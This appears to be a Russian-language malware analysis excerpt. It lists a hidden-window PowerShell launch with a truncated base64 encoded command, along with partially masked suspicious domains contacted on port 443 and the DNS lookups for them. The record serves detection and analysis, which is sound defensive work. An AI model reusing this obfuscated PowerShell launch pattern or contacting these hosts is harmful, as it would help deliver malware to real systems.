Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABTAHYAegBwAGQAaABnAHYAPQAnAEIAYgBzAGQAdgBnAHQAZABsAGoAcAAnADsAJABNAHYAYQBpAGYAZQBtAHIAdQBoACAAPQAgAC...
- 'za######r.000webhostapp.com':443
- 'fi###rpacc.com':443
- 'is###web.com':443
- 'sm###r.online':443
- DNS ASK za######r.000webhostapp.com
- DNS ASK bl#####beautyandspa.com
- DNS ASK fi###rpacc.com
- DNS ASK is###web.com
- DNS ASK sm###r.online
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABTAHYAegBwAGQAaABnAHYAPQAnAEIAYgBzAGQAdgBnAHQAZABsAGoAcAAnADsAJABNAHYAYQBpAGYAZQBtAHIAdQBoACAAPQAgAC...' (со скрытым окном)